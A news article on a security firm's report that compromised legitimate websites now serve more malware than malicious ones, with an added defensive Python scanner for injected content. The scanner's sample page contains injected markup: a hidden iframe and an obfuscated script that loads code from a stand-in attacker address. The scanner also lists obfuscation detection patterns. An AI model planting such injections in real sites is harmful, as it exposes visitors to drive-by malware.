Compromised web sites serve more malware than malicious ones

The fact that legitimate web sites can be compromised and used to distribute malware under an admin's nose is something Ars has touched on of late. In that case, the culprit was one specific kind of JavaScript exploit, but the broader issue of legitimate web sites serving malware is a growing problem.

According to security firm WebSense, the number of legitimate web sites that have been hacked and are now distributing or enabling various types of malware attacks is greater than the number of malicious sites created specifically for that purpose. The company's latest report (PDF) discusses this trend, along with the tremendous impact the Storm Worm had on the 'Net throughout 2007. As WebSense points out, there's a clear advantage to infecting a legitimate site: it comes with its own built-in traffic and user base.

The type of theft varies depending on the site. Personal data and credit card information are the most obvious targets, but online gaming account theft and click fraud are apparently common as well. It's well known that there are forums, discussion groups, and IRC channels devoted to which web sites are known to be vulnerable. The problem also runs deeper than simply educating administrators about security vulnerabilities in the software they use. Locating the correct hosting provider for any particular web space can be difficult, and many sites don't fall off WebSense's malicious site blacklist quickly, sometimes remaining there for weeks or even months after being notified of a problem.
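As an added example (not from the article or from the WebSense report), here is a Python script an administrator could run against a page his own site actually serves, to catch the kinds of injected content that compromises of this sort commonly leave behind: hidden iframes, obfuscated inline script, and script loaded from hosts the site owner never approved. The heuristics, the allowlist `ALLOWED_SCRIPT_HOSTS`, and the sample page (which uses documentation-only IP addresses) are all constructed assumptions, not data from the report.

```python
"""Heuristic scan of served HTML for injected content.

Assumptions (not from the article): a compromised site typically gains a
hidden iframe, an obfuscated inline script (document.write(unescape(...)),
eval, long escaped blobs), or a <script src> pointing at a host the site
owner does not control. Only the standard library is used.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Assumption: the site owner maintains a list of hosts allowed to serve script.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

# Assumption: crude but cheap signatures of obfuscated inline script.
OBFUSCATION_PATTERNS = [
    re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    re.compile(r"(?:%[0-9a-f]{2}){16,}", re.I),    # long URL-escaped blob
    re.compile(r"(?:\\x[0-9a-f]{2}){16,}", re.I),  # long hex-escaped blob
    re.compile(r"\beval\s*\(", re.I),
]


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while walking the page."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            w, h = a.get("width"), a.get("height")
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or w in ("0", "1") or h in ("0", "1"))
            if hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            if src:
                host = urlparse(src).hostname
                if host and host != self.page_host and host not in ALLOWED_SCRIPT_HOSTS:
                    self.findings.append(("external_script", src))

    def handle_data(self, data):
        # HTMLParser hands <script> bodies back as data; buffer them.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            for pat in OBFUSCATION_PATTERNS:
                if pat.search(body):
                    self.findings.append(("obfuscated_script", pat.pattern))
                    break


def scan_html(html, page_host):
    """Return a list of (kind, detail) findings for one served page."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: a legitimate site with three injected additions.
SAMPLE_PAGE = """<html><head><title>Acme Widgets</title>
<script src="https://cdn.example.com/site.js"></script>
</head><body><h1>Welcome</h1>
<iframe src="http://203.0.113.7/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//203.0.113.7/x.js%22%3E%3C/script%3E'));</script>
<script src="http://198.51.100.9/counter.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE, "www.example.com"):
        print(f"{kind}: {detail}")
```

Run it against a page fetched with the same User-Agent and Referer a visitor would send; injected content is often served conditionally, so a fetch from the admin's own workstation may see a clean page. A clean result means only that none of these heuristics fired, not that the site is uncompromised.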

Reports like this highlight the inherent gap between ideal security practices and the real world. Ideally, system admins would be able to install security patches easily and quickly as soon as they became available. Reality, of course, is far more complicated, particularly in a corporate environment. Security updates may need to be carefully vetted before installation to ensure that they don't break anything else, and even that assumes the presence of a system admin with permission to make such decisions without needing a nod from higher up the corporate ladder.

In this case, it's software vendors and web site authors who need to work together and improve their lines of communication, so that fixes are discovered and deployed faster than malware authors can find new holes. Client-side security on any particular system might stop an exploit from infecting one particular machine, but it does nothing for users reaching the same compromised site from other locations.